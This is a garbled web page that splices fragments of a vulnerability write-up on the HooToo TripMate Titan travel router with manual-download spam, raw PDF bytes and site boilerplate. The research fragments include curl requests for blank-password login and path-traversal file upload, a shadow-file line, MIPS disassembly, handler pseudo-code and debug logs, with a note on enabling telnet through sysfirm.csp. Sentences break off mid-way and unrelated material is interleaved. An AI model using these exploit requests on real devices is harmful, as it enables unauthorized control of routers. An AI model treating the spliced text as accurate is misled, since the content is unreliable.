The form data may contain a name and filename parameters (which we didn’t know yet and which looks interesting). And so on. Hi, welcome to, if you intend to locate details about the handbook as well as how to mount for your needs, below we will certainly offer various other details such as, Specs, Configuration Handbook, etc. We confirmed that HooToo TripMate Titan HT-TM05 (firmware HooToo-TM05-Firmare- 2.000.080) was vulnerable to multiple critical vulnerabilities. except requests.exceptions.ConnectionError: , partial ASLR is enabled on the router, but the memory layout of, appears to be quite similar across reboots – hence the hardcoded offsets. Features . Along with them, we can also find additional memory corruption vulnerabilities: Unauthenticated Buffer Overflow in mac_table, Unauthenticated Buffer Overflow in open_forwarding. binary shares the same vulnerabilities, then it is more than likely that the routers are vulnerable as well. :13341:0:99999:7::: Set-cookie: SESSID=p41UE1ZlWl46OrDxongjZirYJ9enqPrQSrAoiwA9JDfw5; 20100000, : Successful login using a blank password, curl -i -s -k  -X $’POST’ -H $’Content-Type: application/x-www-form-urlencoded’ -H $’Content-Length: 42′ -H $’Connection: close’ –data-binary  $’fname=security&opt=pwdchk&. 99 “HooToo TripMate Plus” is an application software for WiFi Disk. Instead, as soon as we understand that we can pass a filename parameter, we could send the following request: Next, consider what happens if we send a POST request whose filename parameter points to a parent directory. endstream endobj 426 0 obj <>/Metadata 62 0 R/PageLayout/OneColumn/Pages 421 0 R/StructTreeRoot 83 0 R/Type/Catalog>> endobj 427 0 obj <>/ExtGState<>/Font<>/XObject<>>>/Rotate 0/StructParents 0/Type/Page>> endobj 428 0 obj <>stream h�b```�ffgAd`C���!�J:I2"��_�zt����a���!���Ԏ�Ԍ���t�6��a�'���d�G�L that he exploited to reach unauthenticated remote code execution. After some reversing, we identify the cgi class, responsible for handling HTTP POST forms: : Snippet of s_cgi structure initialization, .text:004F5A64                 lw      $v1, 0x28+cgi($sp), .text:004F5A68                 lui     $v0, 1, .text:004F5A6C                 addu    $v1, $v0, .text:004F5A70                 la      $v0, loc_4F0000, .text:004F5A74                 nop, .text:004F5A78                 addiu   $v0, (cgi_form – 0x4F0000), .text:004F5A7C                 nop, .text:004F5A80                 sw      $v0, s_cgi.fct_cgi_form($v1). Last October (2017), I had a couple of evenings free during an on-site project. o�Y��v)��CfjHvJxCE�`GCGCF�D�ZG��RG�(�b������ �o�����9���Fe>�K�Fٮ �N��RaHjX�u�O+���@���AX���� �r`���20� owO�     if not os.file.exists(useful_path): os.system(‘mkdir –p %s’ % useful_path),         file = HTTP_POST[‘file’],         fullpath = ‘%s/%s’ % (useful_path, file), os.system(‘chmod 0700 %s’ % fullpath), thread.start_new_thread(do_firmware_update), : Pseudo python code of do_firmware_update, : Exploiting sysfirm.csp to enable telnet, $ curl -i -s -k  -X $’POST’ -H $’AAAA: BBBB’ -H $’Content-Type: multipart/form-data; boundary=———-43′ –data-binary $’————43x0dx0aContent-Disposition: form-data; name=”file”; filename=”AAAA”x0dx0ax0dx0a. All rights reserved. The following curl request attempts to logon the web interface using an empty password, resulting in an error (login failed): By continuing to use the site, you agree to the use of cookies. Save my name, email, and website in this browser for the next time I comment. I think we should have a look. , by many CGI callbacks.                 savesc 3 /usr/sbin/$PRGNAME $SRVNAME,                 echo “$SRVNAME service start failure”. PDF user guides need Adobe Acrobat Reader for viewing and also publishing. Apple MFi certified, 100% compatible with iPhone and iPad. I recommend giving them a read. I usually hope to find nothing (it is always exciting to be in unknown territories) but this time, Google already had multiple hits: GitHub repository containing HooToo TripMate Titan research notes,, “Protecting the digital nomad” (blog post series, part 1 of 4),, “Hacking travel routers like it’s 1999”,, DefCon presentation and blog post series (part. ) , we can already change the content-type of the POST request accordingly: debug output when receiving a POST request, (httpd.c,thdatatab_alloc,1798)Allocate data 0x5af760, (httpd.c,httpd_parse_request,776)recevie length: 273, (httpd.c,httpd_parse_request_line,827)REQLINE:POST, Content-Type: multipart/form-data; boundary=——–2052049399, Content-Disposition: form-data; name=”test”, (cgi.c,cgi_tab_alloc,2148)Allocate cgi 0x0x598ab8, (httpd.c,ht_header_find,1449)Fail: Miss find, (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=SCRIPT_NAME, v=protocol.csp), (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=GATEWAY_INTERFACE, v=CGI/1.1), (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=SERVER_PROTOCOL, v=HTTP/1.1), (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=REQUEST_METHOD, v=POST), (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=SERVER_NAME, v=, (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=SERVER_PORT, v=81), (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=REMOTE_ADDR, v=, (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=REMOTE_IDENT, v=OS:[Windows]-Browser:[]), (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=CONTENT_TYPE, v=multipart/form-data; boundary=——–2052049399), (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=CONTENT_LENGTH, v=95), prgcgi_main_handler begin:prgtab[0].name=protocol.csp, (cgi.c,cgi_init_parse_env,966)cgi->envlen == 0, (cgi.c,cgi_sess_start,1831)Create a new session: BjxbMS2rYcPZzBSn2srcbR37hX7dMSef3LqQuigsn5qUz, prgcgi_main_handler end:prgtab[0].name=protocol.csp, (cgi.c,cgi_tab_free,2187)Free cgi 0x0x598ab8, (ht_cgi.c,ht_cgi_do,184)Free CGI memory finish, (httpd.c,httpd_schedule,685)Socket list are empty.